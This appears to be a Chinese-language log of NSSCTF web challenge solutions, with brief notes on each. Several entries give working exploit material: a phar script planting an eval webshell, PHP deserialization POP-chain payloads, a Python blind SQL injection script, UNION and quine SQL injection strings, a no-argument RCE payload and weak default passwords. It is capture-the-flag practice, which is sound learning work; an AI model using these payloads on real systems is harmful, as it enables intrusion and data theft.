NSSCTF刷web(2)

[NISACTF 2022]bingdundun~

bingdundun处感觉像文件包含,改upload为index
发现确实,猜测会补一个后缀.php
那常规文件包含都不行了,这里还有一个文件上传的功能,考虑phar协议

<?php

$phar = new Phar("test.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();");
$phar->addFromString("test.php",'<?php eval($_GET[1]);?>');
$phar->stopBuffering();

生成的phar文件改后缀zip上传

[HDCTF 2023]Welcome To HDCTF 2023

死了也行直接给的

[NISACTF 2022]midlevel

Smarty ssti
感觉刚做过

[GKCTF 2020]cve版签到

[GXYCTF 2019]BabyUpload

.htaccess
常规的命令执行函数给ban了
用无参rce的方式读一下根目录的文件,看看flag叫什么

scandir(array_rand(array_flip(str_split(set_include_path(dirname(dirname(dirname(getcwd()))))))));
就叫flag,那直接读

[NSSCTF 2022 Spring Recruit]babyphp

[GDOUCTF 2023]EZ WEB

[NISACTF 2022]popchains

<?php


if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}


class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){// 3
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {// 4
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var;
    public function __construct($var){
        $this -> var = $var;
    }
    public function append($value){// 0
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);// 1
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){// 2
        $function = $this->effort;
        return $function();
    }
}
$p = new Road_is_Long();
$R = new Road_is_Long();
$p -> page = $R;
$M = new Make_a_Change();
$R -> string = $M;
$T =new Try_Work_Hard('/flag');
$M -> effort = $T;
echo urlencode(serialize($p))."\n";

O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BO%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3Bs%3A9%3A%22index.php%22%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D%7D%7Ds%3A6%3A%22string%22%3BN%3B%7D

[CISCN 2019华北Day2]Web1

import requests

url = 'http://node2.anna.nssctf.cn:28640//index.php'

flag = ''

for i in range(1, 100):
    s = 33
    e = 130
    mid = (e + s)>>1
    while True:
        payload = {
            'id': 'if(ascii(substr((select(flag)from(flag)),{},1))>{},1,0)'.format(i, mid)
        }
        res = requests.post(url=url, data=payload).text

        if 'Hello, glzjin wants a girlfriend.' in res:
            s = mid
        else:
            e = mid
        mid = (e + s)>>1
        if (e-s) <= 1:
            flag += chr(e)
            print(flag)
            break
    if '}' in flag:
        break

[NSSRound#1 Basic]basic_check

无从下手,看wp是说允许PUT可以直接写马

[HCTF 2018]Warmup

[HNCTF 2022 Week1]2048

[LitCTF 2023]Http pro max plus

[GDOUCTF 2023]泄露的伪装

[HNCTF 2022 Week1]Interesting_include

[第五空间 2021]pklovecloud

<?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct($p) 
    {      
        $this->cinder = $p;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    public function __construct(){
        $this->filename = '../../../../../nssctfasdasdflag';
    }
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}

$ACE = new ace();
$pop = new acp($ACE);

echo urlencode(serialize($pop));

[鹤城杯 2021]Middle magic

[GKCTF 2021]easycms

弱口令 admin 12345

蝉知7.7网上找漏洞
然后尝试复现,我当时做的时候可以执行whoami,当时没做完干别的去了,过几天回来做又不能复现rce的漏洞了
那就和别人wp里写的一样任意文件下载

?m=ui&f=downloadtheme&theme=L2ZsYWc=

[SWPUCTF 2022 新生赛]ez_rce

getshell

直接读flag读不到
搜一下flag
find / -name "flag"

find / -name "flag" -type f -exec cat {} \;

[羊城杯 2020]easycon

base64解码得到flag

[LitCTF 2023]这是什么？SQL ！注一下 ！

-1))))))union select 1,group_concat(flag)from ctftraining.flag%23

[第五空间 2021]yet_another_mysql_injection

admin admin 爆hacker
然后我在这手工测了一会 没什么思路
右键看源码
然后跟进/?source

意思是传的password和查询的password要相同 quine注入

1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

看wp发现第二种做法
phpmyadmin
弱口令 admin admin

登录就行了